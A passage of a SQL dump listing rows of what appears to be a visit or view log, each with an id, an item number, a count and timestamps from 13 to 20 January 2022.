11:50:34'),(42522,1612,1,'2022-01-13','2022-01-13 11:57:53'),(42523,1600,1,'2022-01-13','2022-01-13 12:11:10'),(42524,2769,1,'2022-01-13','2022-01-13 12:20:44'),(42525,4551,1,'2022-01-13','2022-01-13 12:21:28'),(42526,2159,1,'2022-01-13','2022-01-13 12:34:33'),(42527,4529,1,'2022-01-13','2022-01-13 12:36:38'),(42528,469,1,'2022-01-13','2022-01-13 12:43:31'),(42529,4520,1,'2022-01-13','2022-01-13 12:44:51'),(42530,469,1,'2022-01-13','2022-01-13 12:46:54'),(42531,1606,1,'2022-01-13','2022-01-13 12:47:03'),(42532,2152,1,'2022-01-13','2022-01-13 12:47:21'),(42533,477,1,'2022-01-13','2022-01-13 12:52:18'),(42534,4551,1,'2022-01-13','2022-01-13 12:57:48'),(42535,1602,1,'2022-01-13','2022-01-13 13:04:10'),(42536,1602,1,'2022-01-13','2022-01-13 13:12:59'),(42537,87,1,'2022-01-13','2022-01-13 13:16:54'),(42538,486,1,'2022-01-13','2022-01-13 13:17:35'),(42539,3746,1,'2022-01-13','2022-01-13 13:30:38'),(42540,1600,1,'2022-01-13','2022-01-13 13:33:22'),(42541,68,1,'2022-01-13','2022-01-13 13:33:38'),(42542,3664,1,'2022-01-13','2022-01-13 13:55:51'),(42543,4457,1,'2022-01-13','2022-01-13 13:57:03'),(42544,4457,1,'2022-01-13','2022-01-13 14:00:08'),(42545,2293,1,'2022-01-13','2022-01-13 14:05:42'),(42546,2297,1,'2022-01-13','2022-01-13 14:07:21'),(42547,84,1,'2022-01-13','2022-01-13 14:13:35'),(42548,4517,1,'2022-01-13','2022-01-13 14:21:31'),(42549,2297,1,'2022-01-13','2022-01-13 14:51:24'),(42550,3482,1,'2022-01-13','2022-01-13 15:40:00'),(42551,1602,1,'2022-01-13','2022-01-13 16:15:10'),(42552,1588,1,'2022-01-13','2022-01-13 16:26:23'),(42553,91,1,'2022-01-13','2022-01-13 16:59:06'),(42554,72,1,'2022-01-13','2022-01-13 16:59:24'),(42555,469,1,'2022-01-13','2022-01-13 18:10:13'),(42556,1598,1,'2022-01-13','2022-01-13 18:10:32'),(42557,1604,1,'2022-01-13','2022-01-13 18:12:07'),(42558,1586,1,'2022-01-13','2022-01-13 18:14:55'),(42559,2813,1,'2022-01-13','2022-01-13 18:56:52'),(42560,4457,1,'2022-01-13','2022-01-13 19:12:39'),(42561,3285,1,'2022-01-13','2022-01-13 19:25:41'),(42562,1594,1,'2022-01-13','2022-01-13 19:45:06'),(42563,470,1,'2022-01-13','2022-01-13 20:10:11'),(42564,469,1,'2022-01-13','2022-01-13 20:12:01'),(42565,1586,1,'2022-01-13','2022-01-13 20:21:37'),(42566,1594,1,'2022-01-13','2022-01-13 20:42:34'),(42567,3781,1,'2022-01-13','2022-01-13 21:08:22'),(42568,80,1,'2022-01-13','2022-01-13 21:24:41'),(42569,1598,1,'2022-01-13','2022-01-13 21:59:50'),(42570,1872,1,'2022-01-13','2022-01-13 22:15:03'),(42571,2457,1,'2022-01-13','2022-01-13 22:28:31'),(42572,2769,1,'2022-01-13','2022-01-13 23:31:49'),(42573,3005,1,'2022-01-13','2022-01-13 23:48:44'),(42574,1592,1,'2022-01-14','2022-01-14 00:15:32'),(42575,2309,1,'2022-01-14','2022-01-14 00:40:01'),(42576,2309,1,'2022-01-14','2022-01-14 00:40:28'),(42577,1600,1,'2022-01-14','2022-01-14 00:52:19'),(42578,1600,1,'2022-01-14','2022-01-14 00:52:22'),(42579,72,1,'2022-01-14','2022-01-14 01:15:29'),(42580,1586,1,'2022-01-14','2022-01-14 01:51:48'),(42581,1728,1,'2022-01-14','2022-01-14 02:13:18'),(42582,470,1,'2022-01-14','2022-01-14 03:33:27'),(42583,470,1,'2022-01-14','2022-01-14 03:35:08'),(42584,80,1,'2022-01-14','2022-01-14 03:49:14'),(42585,3313,1,'2022-01-14','2022-01-14 03:58:51'),(42586,4542,1,'2022-01-14','2022-01-14 04:20:44'),(42587,2297,1,'2022-01-14','2022-01-14 04:38:07'),(42588,3781,1,'2022-01-14','2022-01-14 04:43:40'),(42589,3781,1,'2022-01-14','2022-01-14 04:44:03'),(42590,4542,1,'2022-01-14','2022-01-14 04:50:02'),(42591,4551,1,'2022-01-14','2022-01-14 05:21:41'),(42592,1602,1,'2022-01-14','2022-01-14 05:28:57'),(42593,1582,1,'2022-01-14','2022-01-14 05:52:00'),(42594,2457,1,'2022-01-14','2022-01-14 06:38:33'),(42595,108,1,'2022-01-14','2022-01-14 07:35:42'),(42596,1608,1,'2022-01-14','2022-01-14 07:36:15'),(42597,469,1,'2022-01-14','2022-01-14 07:53:42'),(42598,3691,1,'2022-01-14','2022-01-14 08:13:57'),(42599,2309,1,'2022-01-14','2022-01-14 08:32:01'),(42600,1594,1,'2022-01-14','2022-01-14 08:36:10'),(42601,486,1,'2022-01-14','2022-01-14 08:54:57'),(42602,1606,1,'2022-01-14','2022-01-14 09:07:58'),(42603,72,1,'2022-01-14','2022-01-14 09:22:40'),(42604,472,1,'2022-01-14','2022-01-14 09:30:43'),(42605,1598,1,'2022-01-14','2022-01-14 09:42:41'),(42606,2617,1,'2022-01-14','2022-01-14 09:59:57'),(42607,1602,1,'2022-01-14','2022-01-14 10:12:53'),(42608,108,1,'2022-01-14','2022-01-14 10:35:25'),(42609,4404,1,'2022-01-14','2022-01-14 10:35:35'),(42610,472,1,'2022-01-14','2022-01-14 10:35:37'),(42611,1600,1,'2022-01-14','2022-01-14 10:37:02'),(42612,1608,1,'2022-01-14','2022-01-14 10:58:18'),(42613,1608,1,'2022-01-14','2022-01-14 10:58:20'),(42614,1604,1,'2022-01-14','2022-01-14 11:20:16'),(42615,89,1,'2022-01-14','2022-01-14 11:30:05'),(42616,1612,1,'2022-01-14','2022-01-14 11:48:38'),(42617,91,1,'2022-01-14','2022-01-14 12:20:54'),(42618,1718,1,'2022-01-14','2022-01-14 12:21:27'),(42619,1768,1,'2022-01-14','2022-01-14 12:23:51'),(42620,1768,1,'2022-01-14','2022-01-14 12:24:00'),(42621,91,1,'2022-01-14','2022-01-14 12:26:04'),(42622,4556,1,'2022-01-14','2022-01-14 12:38:34'),(42623,91,1,'2022-01-14','2022-01-14 12:38:59'),(42624,4556,1,'2022-01-14','2022-01-14 12:39:18'),(42625,4556,1,'2022-01-14','2022-01-14 12:51:21'),(42626,3781,1,'2022-01-14','2022-01-14 12:58:29'),(42627,1582,1,'2022-01-14','2022-01-14 13:53:22'),(42628,1582,1,'2022-01-14','2022-01-14 13:54:45'),(42629,1604,1,'2022-01-14','2022-01-14 13:58:35'),(42630,1718,1,'2022-01-14','2022-01-14 14:32:58'),(42631,1734,1,'2022-01-14','2022-01-14 14:55:52'),(42632,1608,1,'2022-01-14','2022-01-14 15:47:36'),(42633,2457,1,'2022-01-14','2022-01-14 15:52:42'),(42634,72,1,'2022-01-14','2022-01-14 16:35:04'),(42635,2309,1,'2022-01-14','2022-01-14 17:00:51'),(42636,1602,1,'2022-01-14','2022-01-14 18:03:34'),(42637,4457,1,'2022-01-14','2022-01-14 18:06:02'),(42638,2159,1,'2022-01-14','2022-01-14 19:06:05'),(42639,2159,1,'2022-01-14','2022-01-14 19:06:35'),(42640,2159,1,'2022-01-14','2022-01-14 19:07:31'),(42641,2159,1,'2022-01-14','2022-01-14 19:08:22'),(42642,80,1,'2022-01-14','2022-01-14 20:03:12'),(42643,2309,1,'2022-01-14','2022-01-14 20:30:27'),(42644,2309,1,'2022-01-14','2022-01-14 20:31:00'),(42645,469,1,'2022-01-14','2022-01-14 20:56:23'),(42646,4520,1,'2022-01-14','2022-01-14 20:58:47'),(42647,3781,1,'2022-01-14','2022-01-14 22:01:32'),(42648,2309,1,'2022-01-14','2022-01-14 22:02:01'),(42649,3438,1,'2022-01-14','2022-01-14 23:05:33'),(42650,2457,1,'2022-01-14','2022-01-14 23:16:59'),(42651,1592,1,'2022-01-14','2022-01-14 23:41:17'),(42652,1592,1,'2022-01-14','2022-01-14 23:42:58'),(42653,1614,1,'2022-01-14','2022-01-14 23:58:36'),(42654,1728,1,'2022-01-15','2022-01-15 00:03:42'),(42655,80,1,'2022-01-15','2022-01-15 00:10:45'),(42656,3313,1,'2022-01-15','2022-01-15 00:31:24'),(42657,2617,1,'2022-01-15','2022-01-15 01:00:39'),(42658,1614,1,'2022-01-15','2022-01-15 01:02:58'),(42659,4457,1,'2022-01-15','2022-01-15 01:05:17'),(42660,470,1,'2022-01-15','2022-01-15 01:15:39'),(42661,1582,1,'2022-01-15','2022-01-15 02:40:54'),(42662,1610,1,'2022-01-15','2022-01-15 02:52:15'),(42663,1596,1,'2022-01-15','2022-01-15 02:57:49'),(42664,1586,1,'2022-01-15','2022-01-15 04:12:26'),(42665,1586,1,'2022-01-15','2022-01-15 04:13:25'),(42666,1586,1,'2022-01-15','2022-01-15 04:14:10'),(42667,335,1,'2022-01-15','2022-01-15 04:24:25'),(42668,68,1,'2022-01-15','2022-01-15 04:24:37'),(42669,570,1,'2022-01-15','2022-01-15 04:30:43'),(42670,2152,1,'2022-01-15','2022-01-15 04:40:02'),(42671,1608,1,'2022-01-15','2022-01-15 05:09:39'),(42672,3746,1,'2022-01-15','2022-01-15 05:20:13'),(42673,4514,1,'2022-01-15','2022-01-15 05:20:54'),(42674,2309,1,'2022-01-15','2022-01-15 05:22:47'),(42675,3030,1,'2022-01-15','2022-01-15 05:35:19'),(42676,472,1,'2022-01-15','2022-01-15 05:39:38'),(42677,1604,1,'2022-01-15','2022-01-15 05:49:04'),(42678,1582,1,'2022-01-15','2022-01-15 06:04:32'),(42679,2813,1,'2022-01-15','2022-01-15 06:17:09'),(42680,477,1,'2022-01-15','2022-01-15 06:20:00'),(42681,3781,1,'2022-01-15','2022-01-15 06:28:01'),(42682,3072,1,'2022-01-15','2022-01-15 06:28:40'),(42683,2769,1,'2022-01-15','2022-01-15 06:37:06'),(42684,1592,1,'2022-01-15','2022-01-15 06:44:53'),(42685,1602,1,'2022-01-15','2022-01-15 07:07:49'),(42686,1695,1,'2022-01-15','2022-01-15 07:09:52'),(42687,2457,1,'2022-01-15','2022-01-15 07:16:13'),(42688,1614,1,'2022-01-15','2022-01-15 07:23:33'),(42689,3438,1,'2022-01-15','2022-01-15 07:31:30'),(42690,1877,1,'2022-01-15','2022-01-15 07:39:28'),(42691,80,1,'2022-01-15','2022-01-15 07:57:56'),(42692,2804,1,'2022-01-15','2022-01-15 08:07:45'),(42693,3087,1,'2022-01-15','2022-01-15 09:17:17'),(42694,570,1,'2022-01-15','2022-01-15 09:41:28'),(42695,4412,1,'2022-01-15','2022-01-15 09:42:45'),(42696,4238,1,'2022-01-15','2022-01-15 09:50:44'),(42697,4238,1,'2022-01-15','2022-01-15 09:50:46'),(42698,3127,1,'2022-01-15','2022-01-15 10:03:47'),(42699,468,1,'2022-01-15','2022-01-15 10:17:10'),(42700,84,1,'2022-01-15','2022-01-15 10:17:25'),(42701,91,1,'2022-01-15','2022-01-15 10:17:49'),(42702,1707,1,'2022-01-15','2022-01-15 10:18:58'),(42703,4440,1,'2022-01-15','2022-01-15 10:20:38'),(42704,1602,1,'2022-01-15','2022-01-15 10:48:31'),(42705,91,1,'2022-01-15','2022-01-15 10:48:54'),(42706,108,1,'2022-01-15','2022-01-15 10:49:37'),(42707,1602,1,'2022-01-15','2022-01-15 10:56:18'),(42708,1592,1,'2022-01-15','2022-01-15 13:29:44'),(42709,68,1,'2022-01-15','2022-01-15 13:30:12'),(42710,1592,1,'2022-01-15','2022-01-15 13:30:31'),(42711,1592,1,'2022-01-15','2022-01-15 13:30:47'),(42712,80,1,'2022-01-15','2022-01-15 13:53:43'),(42713,72,1,'2022-01-15','2022-01-15 14:07:50'),(42714,80,1,'2022-01-15','2022-01-15 16:41:55'),(42715,2297,1,'2022-01-15','2022-01-15 17:27:28'),(42716,1610,1,'2022-01-15','2022-01-15 18:01:51'),(42717,1608,1,'2022-01-15','2022-01-15 18:04:13'),(42718,2309,1,'2022-01-15','2022-01-15 18:11:02'),(42719,1586,1,'2022-01-15','2022-01-15 18:13:05'),(42720,1602,1,'2022-01-15','2022-01-15 18:32:22'),(42721,3691,1,'2022-01-15','2022-01-15 18:54:16'),(42722,469,1,'2022-01-15','2022-01-15 18:57:29'),(42723,472,1,'2022-01-15','2022-01-15 19:13:01'),(42724,3764,1,'2022-01-15','2022-01-15 19:21:51'),(42725,3764,1,'2022-01-15','2022-01-15 19:21:57'),(42726,4514,1,'2022-01-15','2022-01-15 19:26:53'),(42727,3691,1,'2022-01-15','2022-01-15 19:27:21'),(42728,2609,1,'2022-01-15','2022-01-15 19:47:53'),(42729,4520,1,'2022-01-15','2022-01-15 19:49:02'),(42730,2609,1,'2022-01-15','2022-01-15 19:49:36'),(42731,1588,1,'2022-01-15','2022-01-15 19:50:17'),(42732,1604,1,'2022-01-15','2022-01-15 20:01:44'),(42733,1604,1,'2022-01-15','2022-01-15 20:02:11'),(42734,1608,1,'2022-01-15','2022-01-15 20:15:28'),(42735,3030,1,'2022-01-15','2022-01-15 20:21:17'),(42736,2457,1,'2022-01-15','2022-01-15 20:36:10'),(42737,2148,1,'2022-01-15','2022-01-15 20:44:48'),(42738,3781,1,'2022-01-15','2022-01-15 20:48:20'),(42739,2148,1,'2022-01-15','2022-01-15 20:52:56'),(42740,80,1,'2022-01-15','2022-01-15 20:55:14'),(42741,469,1,'2022-01-15','2022-01-15 20:56:27'),(42742,1602,1,'2022-01-15','2022-01-15 21:01:37'),(42743,80,1,'2022-01-15','2022-01-15 21:02:37'),(42744,1582,1,'2022-01-15','2022-01-15 21:05:00'),(42745,1594,1,'2022-01-15','2022-01-15 21:05:49'),(42746,89,1,'2022-01-15','2022-01-15 21:11:12'),(42747,1608,1,'2022-01-15','2022-01-15 21:11:52'),(42748,1614,1,'2022-01-15','2022-01-15 21:17:44'),(42749,89,1,'2022-01-15','2022-01-15 21:23:13'),(42750,80,1,'2022-01-15','2022-01-15 21:23:16'),(42751,1594,1,'2022-01-15','2022-01-15 21:28:20'),(42752,1592,1,'2022-01-15','2022-01-15 21:30:04'),(42753,1606,1,'2022-01-15','2022-01-15 21:53:53'),(42754,1606,1,'2022-01-15','2022-01-15 21:54:09'),(42755,1596,1,'2022-01-15','2022-01-15 21:56:05'),(42756,1606,1,'2022-01-15','2022-01-15 21:56:07'),(42757,72,1,'2022-01-15','2022-01-15 22:03:33'),(42758,2769,1,'2022-01-15','2022-01-15 22:06:01'),(42759,1877,1,'2022-01-15','2022-01-15 23:04:50'),(42760,2704,1,'2022-01-16','2022-01-16 01:14:11'),(42761,3045,1,'2022-01-16','2022-01-16 01:42:25'),(42762,1586,1,'2022-01-16','2022-01-16 02:47:52'),(42763,1600,1,'2022-01-16','2022-01-16 03:06:40'),(42764,1872,1,'2022-01-16','2022-01-16 04:35:13'),(42765,2309,1,'2022-01-16','2022-01-16 04:46:59'),(42766,1588,1,'2022-01-16','2022-01-16 05:03:13'),(42767,472,1,'2022-01-16','2022-01-16 05:11:40'),(42768,1544,1,'2022-01-16','2022-01-16 05:21:35'),(42769,1598,1,'2022-01-16','2022-01-16 05:23:42'),(42770,469,1,'2022-01-16','2022-01-16 05:23:56'),(42771,1594,1,'2022-01-16','2022-01-16 05:41:07'),(42772,3030,1,'2022-01-16','2022-01-16 05:52:48'),(42773,1608,1,'2022-01-16','2022-01-16 06:01:03'),(42774,1604,1,'2022-01-16','2022-01-16 06:13:19'),(42775,1582,1,'2022-01-16','2022-01-16 06:25:32'),(42776,1586,1,'2022-01-16','2022-01-16 06:31:02'),(42777,72,1,'2022-01-16','2022-01-16 06:47:24'),(42778,2769,1,'2022-01-16','2022-01-16 06:49:27'),(42779,1586,1,'2022-01-16','2022-01-16 07:01:17'),(42780,3282,1,'2022-01-16','2022-01-16 07:15:26'),(42781,1718,1,'2022-01-16','2022-01-16 07:39:54'),(42782,1602,1,'2022-01-16','2022-01-16 09:40:46'),(42783,2159,1,'2022-01-16','2022-01-16 11:26:54'),(42784,2159,1,'2022-01-16','2022-01-16 11:27:02'),(42785,1600,1,'2022-01-16','2022-01-16 12:32:43'),(42786,2309,1,'2022-01-16','2022-01-16 12:32:59'),(42787,2159,1,'2022-01-16','2022-01-16 12:33:01'),(42788,2309,1,'2022-01-16','2022-01-16 12:33:08'),(42789,1586,1,'2022-01-16','2022-01-16 13:17:17'),(42790,1600,1,'2022-01-16','2022-01-16 14:09:10'),(42791,1602,1,'2022-01-16','2022-01-16 14:23:40'),(42792,1586,1,'2022-01-16','2022-01-16 14:23:58'),(42793,1594,1,'2022-01-16','2022-01-16 14:45:57'),(42794,1600,1,'2022-01-16','2022-01-16 14:46:49'),(42795,80,1,'2022-01-16','2022-01-16 14:48:03'),(42796,1600,1,'2022-01-16','2022-01-16 14:48:47'),(42797,469,1,'2022-01-16','2022-01-16 15:03:56'),(42798,1588,1,'2022-01-16','2022-01-16 15:10:31'),(42799,72,1,'2022-01-16','2022-01-16 15:12:06'),(42800,4524,1,'2022-01-16','2022-01-16 15:27:10'),(42801,2904,1,'2022-01-16','2022-01-16 15:29:02'),(42802,472,1,'2022-01-16','2022-01-16 15:30:03'),(42803,1608,1,'2022-01-16','2022-01-16 16:14:17'),(42804,1604,1,'2022-01-16','2022-01-16 16:25:38'),(42805,2297,1,'2022-01-16','2022-01-16 16:35:22'),(42806,1608,1,'2022-01-16','2022-01-16 16:40:03'),(42807,76,1,'2022-01-16','2022-01-16 16:50:54'),(42808,76,1,'2022-01-16','2022-01-16 16:51:11'),(42809,68,1,'2022-01-16','2022-01-16 16:51:15'),(42810,91,1,'2022-01-16','2022-01-16 16:52:43'),(42811,4546,1,'2022-01-16','2022-01-16 16:52:59'),(42812,4546,1,'2022-01-16','2022-01-16 16:53:00'),(42813,4448,1,'2022-01-16','2022-01-16 17:03:42'),(42814,4420,1,'2022-01-16','2022-01-16 17:06:37'),(42815,1598,1,'2022-01-16','2022-01-16 19:40:47'),(42816,1610,1,'2022-01-16','2022-01-16 20:17:08'),(42817,1594,1,'2022-01-16','2022-01-16 22:34:03'),(42818,1594,1,'2022-01-16','2022-01-16 22:49:37'),(42819,1600,1,'2022-01-16','2022-01-16 22:52:40'),(42820,1602,1,'2022-01-16','2022-01-16 23:03:40'),(42821,2159,1,'2022-01-16','2022-01-16 23:03:44'),(42822,1586,1,'2022-01-16','2022-01-16 23:26:40'),(42823,1594,1,'2022-01-16','2022-01-16 23:41:53'),(42824,1594,1,'2022-01-16','2022-01-16 23:42:01'),(42825,3045,1,'2022-01-16','2022-01-16 23:48:04'),(42826,2159,1,'2022-01-17','2022-01-17 00:33:05'),(42827,1872,1,'2022-01-17','2022-01-17 00:33:39'),(42828,1594,1,'2022-01-17','2022-01-17 00:54:50'),(42829,3691,1,'2022-01-17','2022-01-17 01:24:49'),(42830,469,1,'2022-01-17','2022-01-17 01:40:38'),(42831,1588,1,'2022-01-17','2022-01-17 01:54:45'),(42832,1604,1,'2022-01-17','2022-01-17 02:09:44'),(42833,472,1,'2022-01-17','2022-01-17 02:24:47'),(42834,2457,1,'2022-01-17','2022-01-17 02:40:08'),(42835,1586,1,'2022-01-17','2022-01-17 02:54:48'),(42836,1598,1,'2022-01-17','2022-01-17 04:25:48'),(42837,1604,1,'2022-01-17','2022-01-17 04:31:38'),(42838,1602,1,'2022-01-17','2022-01-17 05:07:36'),(42839,1544,1,'2022-01-17','2022-01-17 05:16:40'),(42840,1610,1,'2022-01-17','2022-01-17 05:39:36'),(42841,1610,1,'2022-01-17','2022-01-17 05:39:41'),(42842,2971,1,'2022-01-17','2022-01-17 06:09:21'),(42843,1602,1,'2022-01-17','2022-01-17 07:01:18'),(42844,1608,1,'2022-01-17','2022-01-17 07:02:06'),(42845,470,1,'2022-01-17','2022-01-17 07:12:23'),(42846,2309,1,'2022-01-17','2022-01-17 07:36:06'),(42847,1586,1,'2022-01-17','2022-01-17 08:10:06'),(42848,1586,1,'2022-01-17','2022-01-17 08:40:18'),(42849,1606,1,'2022-01-17','2022-01-17 08:52:25'),(42850,1600,1,'2022-01-17','2022-01-17 09:03:24'),(42851,1598,1,'2022-01-17','2022-01-17 09:05:47'),(42852,1594,1,'2022-01-17','2022-01-17 09:56:33'),(42853,2813,1,'2022-01-17','2022-01-17 10:26:19'),(42854,3045,1,'2022-01-17','2022-01-17 10:27:51'),(42855,2813,1,'2022-01-17','2022-01-17 10:32:24'),(42856,2309,1,'2022-01-17','2022-01-17 11:21:58'),(42857,1600,1,'2022-01-17','2022-01-17 11:22:33'),(42858,2150,1,'2022-01-17','2022-01-17 11:35:21'),(42859,1600,1,'2022-01-17','2022-01-17 11:35:46'),(42860,1598,1,'2022-01-17','2022-01-17 12:58:43'),(42861,1598,1,'2022-01-17','2022-01-17 12:59:34'),(42862,4457,1,'2022-01-17','2022-01-17 13:35:57'),(42863,472,1,'2022-01-17','2022-01-17 13:38:33'),(42864,3585,1,'2022-01-17','2022-01-17 13:57:38'),(42865,3585,1,'2022-01-17','2022-01-17 13:58:00'),(42866,1604,1,'2022-01-17','2022-01-17 14:00:06'),(42867,486,1,'2022-01-17','2022-01-17 14:00:30'),(42868,3030,1,'2022-01-17','2022-01-17 14:23:16'),(42869,1582,1,'2022-01-17','2022-01-17 14:45:13'),(42870,3764,1,'2022-01-17','2022-01-17 14:49:55'),(42871,1586,1,'2022-01-17','2022-01-17 15:01:10'),(42872,1602,1,'2022-01-17','2022-01-17 15:05:04'),(42873,1602,1,'2022-01-17','2022-01-17 15:05:17'),(42874,72,1,'2022-01-17','2022-01-17 15:53:45'),(42875,4508,1,'2022-01-17','2022-01-17 15:54:01'),(42876,72,1,'2022-01-17','2022-01-17 15:54:26'),(42877,4510,1,'2022-01-17','2022-01-17 15:54:31'),(42878,72,1,'2022-01-17','2022-01-17 15:54:46'),(42879,1614,1,'2022-01-17','2022-01-17 16:08:12'),(42880,1604,1,'2022-01-17','2022-01-17 16:51:47'),(42881,1586,1,'2022-01-17','2022-01-17 17:12:36'),(42882,1586,1,'2022-01-17','2022-01-17 17:23:58'),(42883,2309,1,'2022-01-17','2022-01-17 17:42:22'),(42884,1600,1,'2022-01-17','2022-01-17 18:01:15'),(42885,89,1,'2022-01-17','2022-01-17 18:18:16'),(42886,1604,1,'2022-01-17','2022-01-17 19:02:58'),(42887,1872,1,'2022-01-17','2022-01-17 19:09:40'),(42888,2457,1,'2022-01-17','2022-01-17 19:36:02'),(42889,1602,1,'2022-01-17','2022-01-17 22:42:59'),(42890,1594,1,'2022-01-17','2022-01-17 22:44:11'),(42891,1604,1,'2022-01-18','2022-01-18 00:00:22'),(42892,72,1,'2022-01-18','2022-01-18 00:12:46'),(42893,2804,1,'2022-01-18','2022-01-18 01:58:39'),(42894,80,1,'2022-01-18','2022-01-18 03:36:03'),(42895,89,1,'2022-01-18','2022-01-18 05:50:37'),(42896,76,1,'2022-01-18','2022-01-18 06:31:57'),(42897,68,1,'2022-01-18','2022-01-18 06:32:13'),(42898,1602,1,'2022-01-18','2022-01-18 08:54:46'),(42899,80,1,'2022-01-18','2022-01-18 09:08:46'),(42900,2617,1,'2022-01-18','2022-01-18 09:40:18'),(42901,80,1,'2022-01-18','2022-01-18 10:12:55'),(42902,68,1,'2022-01-18','2022-01-18 10:13:00'),(42903,108,1,'2022-01-18','2022-01-18 10:13:04'),(42904,1614,1,'2022-01-18','2022-01-18 10:51:48'),(42905,68,1,'2022-01-18','2022-01-18 12:07:23'),(42906,1602,1,'2022-01-18','2022-01-18 12:07:46'),(42907,76,1,'2022-01-18','2022-01-18 12:07:58'),(42908,1728,1,'2022-01-18','2022-01-18 12:46:11'),(42909,1728,1,'2022-01-18','2022-01-18 12:47:02'),(42910,3280,1,'2022-01-18','2022-01-18 13:53:12'),(42911,3280,1,'2022-01-18','2022-01-18 13:53:20'),(42912,3280,1,'2022-01-18','2022-01-18 13:53:28'),(42913,3280,1,'2022-01-18','2022-01-18 13:54:01'),(42914,3280,1,'2022-01-18','2022-01-18 13:54:11'),(42915,3273,1,'2022-01-18','2022-01-18 13:57:31'),(42916,1600,1,'2022-01-18','2022-01-18 14:46:34'),(42917,1588,1,'2022-01-18','2022-01-18 15:19:59'),(42918,2297,1,'2022-01-18','2022-01-18 15:34:55'),(42919,80,1,'2022-01-18','2022-01-18 15:35:44'),(42920,1582,1,'2022-01-18','2022-01-18 16:41:04'),(42921,1600,1,'2022-01-18','2022-01-18 16:56:53'),(42922,2148,1,'2022-01-18','2022-01-18 18:12:06'),(42923,1602,1,'2022-01-18','2022-01-18 18:12:11'),(42924,91,1,'2022-01-18','2022-01-18 18:17:05'),(42925,89,1,'2022-01-18','2022-01-18 18:40:50'),(42926,3482,1,'2022-01-18','2022-01-18 20:43:07'),(42927,4238,1,'2022-01-18','2022-01-18 20:44:31'),(42928,72,1,'2022-01-18','2022-01-18 22:28:39'),(42929,2297,1,'2022-01-18','2022-01-18 22:48:37'),(42930,1586,1,'2022-01-18','2022-01-18 22:48:44'),(42931,1715,1,'2022-01-18','2022-01-18 23:13:09'),(42932,1602,1,'2022-01-18','2022-01-18 23:18:42'),(42933,2704,1,'2022-01-18','2022-01-18 23:34:00'),(42934,1602,1,'2022-01-19','2022-01-19 01:50:37'),(42935,3005,1,'2022-01-19','2022-01-19 02:24:01'),(42936,1612,1,'2022-01-19','2022-01-19 03:04:07'),(42937,4529,1,'2022-01-19','2022-01-19 03:04:28'),(42938,1612,1,'2022-01-19','2022-01-19 03:49:34'),(42939,4391,1,'2022-01-19','2022-01-19 03:57:16'),(42940,72,1,'2022-01-19','2022-01-19 05:31:28'),(42941,2309,1,'2022-01-19','2022-01-19 06:46:19'),(42942,1778,1,'2022-01-19','2022-01-19 07:07:45'),(42943,472,1,'2022-01-19','2022-01-19 07:49:32'),(42944,2617,1,'2022-01-19','2022-01-19 08:57:12'),(42945,2297,1,'2022-01-19','2022-01-19 09:16:31'),(42946,1602,1,'2022-01-19','2022-01-19 09:36:08'),(42947,3083,1,'2022-01-19','2022-01-19 09:40:23'),(42948,2297,1,'2022-01-19','2022-01-19 10:46:20'),(42949,108,1,'2022-01-19','2022-01-19 10:49:39'),(42950,3781,1,'2022-01-19','2022-01-19 11:53:22'),(42951,1728,1,'2022-01-19','2022-01-19 14:54:37'),(42952,1602,1,'2022-01-19','2022-01-19 15:32:47'),(42953,1606,1,'2022-01-19','2022-01-19 17:18:49'),(42954,4524,1,'2022-01-19','2022-01-19 17:23:22'),(42955,1602,1,'2022-01-19','2022-01-19 17:35:02'),(42956,76,1,'2022-01-19','2022-01-19 17:42:40'),(42957,68,1,'2022-01-19','2022-01-19 17:43:24'),(42958,4416,1,'2022-01-19','2022-01-19 17:50:59'),(42959,4457,1,'2022-01-19','2022-01-19 18:09:27'),(42960,3781,1,'2022-01-19','2022-01-19 18:21:11'),(42961,1544,1,'2022-01-19','2022-01-19 18:27:24'),(42962,3781,1,'2022-01-19','2022-01-19 18:31:56'),(42963,4457,1,'2022-01-19','2022-01-19 20:02:35'),(42964,3102,1,'2022-01-19','2022-01-19 20:28:59'),(42965,1602,1,'2022-01-19','2022-01-19 23:21:14'),(42966,3259,1,'2022-01-20','2022-01-20 00:29:21'),(42967,1592,1,'2022-01-20','2022-01-20 01:45:21'),(42968,2804,1,'2022-01-20','2022-01-20 02:01:25'),(42969,1870,1,'2022-01-20','2022-01-20 02:09:37'),(42970,1586,1,'2022-01-20','2022-01-20 02:24:55'),(42971,472,1,'2022-01-20','2022-01-20 02:44:54'),(42972,2989,1,'2022-01-20','2022-01-20 02:50:15'),(42973,1602,1,'2022-01-20','2022-01-20 03:29:50'),(42974,3096,1,'2022-01-20','2022-01-20 03:34:04'),(42975,72,1,'2022-01-20','2022-01-20 05:24:51'),(42976,2617,1,'2022-01-20','2022-01-20 07:00:30'),(42977,570,1,'2022-01-20','2022-01-20 08:00:19'),(42978,1582,1,'2022-01-20','2022-01-20 08:04:03'),(42979,4457,1,'2022-01-20','2022-01-20 08:11:12'),(42980,68,1,'2022-01-20','2022-01-20 08:15:34'),(42981,89,1,'2022-01-20','2022-01-20 09:05:22'),(42982,4508,1,'2022-01-20','2022-01-20 09:53:39'),(42983,1612,1,'2022-01-20','2022-01-20 10:32:33'),(42984,4412,1,'2022-01-20','2022-01-20 12:32:03'),(42985,1606,1,'2022-01-20','2022-01-20 12:54:46'),(42986,1606,1,'2022-01-20','2022-01-20 12:55:37'),(42987,1728,1,'2022-01-20','2022-01-20 14:36:41'),(42988,1602,1,'2022-01-20','2022-01-20 14:38:42'),(42989,1602,1,'2022-01-20','2022-01-20 15:21:35'),(42990,1718,1,'2022-01-20','2022-01-20 16:02:20'),(42991,1606,1,'2022-01-20','2022-01-20 16:10:44'),(42992,1602,1,'2022-01-20','2022-01-20 16:38:59'),(42993,1602,1,'2022-01-20','2022-01-20 16:40:41'),(42994,68,1,'2022-01-20','2022-01-20 16:43:48'),(42995,1602,1,'2022-01-20','2022-01-20 16:44:14'),(42996,108,1,'2022-01-20','2022-01-20 16:48:16'),(42997,1608,1,'2022-01-20','2022-01-20 16:48:17'),(42998,68,1,'2022-01-20','2022-01-20 17:05:42'),(42999,76,1,'2022-01-20','2022-01-20 17:06:14'),(43000,1600,1,'2022-01-20','2022-01-20 17:31:42'),(43001,4416,1,'2022-01-20','2022-01-20 17:34:11'),(43002,1870,1,'2022-01-20','2022-01-20 17:45:15'),(43003,1600,1,'2022-01-20','2022-01-20 18:00:32'),(43004,2704,1,'2022-01-20','2022-01-20 18:10:48'),(43005,4524,1,'2022-01-20','2022-01-20 18:18:59'),(43006,1612,1,'2022-01-20','2022-01-20 18:19:37'),(43007,1870,1,'2022-01-20','2022-01-20 18:21:27'),(43008,1600,1,'2022-01-20','2022-01-20 